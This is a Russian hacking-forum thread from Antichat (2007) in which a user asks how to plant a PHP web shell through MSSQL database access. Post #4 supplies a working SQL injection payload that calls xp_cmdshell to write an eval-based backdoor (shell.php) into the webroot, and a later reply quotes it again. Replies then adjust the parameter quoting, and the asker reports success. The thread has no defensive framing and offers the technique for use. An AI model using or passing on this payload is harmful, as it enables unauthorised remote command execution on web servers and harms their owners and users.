HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу Шелл через Mssql
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Шелл через Mssql
  #1  
Старый 19.09.2007, 19:58
Sharky
Познавший АНТИЧАТ
Регистрация: 01.05.2006
Сообщений: 1,021
С нами: 10541186

Репутация: 921


По умолчанию Шелл через Mssql
Как имея доступ к mssql базе залить php шелл
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.09.2007, 22:07
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами: 10533245

Репутация: 773


По умолчанию
Вы хоть пытайтесь поискать))
http://video.antichat.ru/file240.html


up
ссоории не заметил...
Последний раз редактировалось Zitt; 19.09.2007 в 23:49..
 
Ответить с цитированием

  #3  
Старый 19.09.2007, 23:25
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
Zitt
Читай внимательней у my и ms sql совсем разный синтаксис.

Sharky
Исполнение команд будет работать зальешь, не будет работать... ну разве только через админку, в остальных случаях...
 
Ответить с цитированием

  #4  
Старый 19.09.2007, 23:48
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию
'; use master exec xp_cmdshell 'echo "<? eval(stripslashes($_GET[c])); > C:/webserver/www/shell.php ?>"';--

Подкорректировать под себя
 
Ответить с цитированием

  #5  
Старый 19.09.2007, 23:58
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
Цитата:
; use master exec xp_cmdshell 'echo "<? eval(stripslashes($_GET[c])); > C:/webserver/www/shell.php ?>"';--
$_GET['c']
 
Ответить с цитированием

  #6  
Старый 20.09.2007, 00:06
ant0ha
Участник форума
Регистрация: 22.05.2007
Сообщений: 144
С нами: 9985348

Репутация: 119
По умолчанию
Цитата:
Сообщение от [ cash ]  
$_GET['c']
вовсе не обязательно, притом что в запросе одинарные кавычки уже используются, тока конфликт возникнет
 
Ответить с цитированием

  #7  
Старый 20.09.2007, 18:04
Sharky
Познавший АНТИЧАТ
Регистрация: 01.05.2006
Сообщений: 1,021
С нами: 10541186

Репутация: 921


По умолчанию
всем спасибо...сделал что надо...тему можно закрыть...
 
Ответить с цитированием

  #8  
Старый 20.09.2007, 20:44
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
ну отпиши как сделал )
 
Ответить с цитированием

  #9  
Старый 20.09.2007, 20:55
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами: 10495046

Репутация: 2642


По умолчанию
А причём здесь "PHP, PERL, MySQL, JavaScript"?
Почему не "Уязвимости"?
 
Ответить с цитированием

  #10  
Старый 20.09.2007, 21:26
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
2 NOmeR1
Так надо )
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.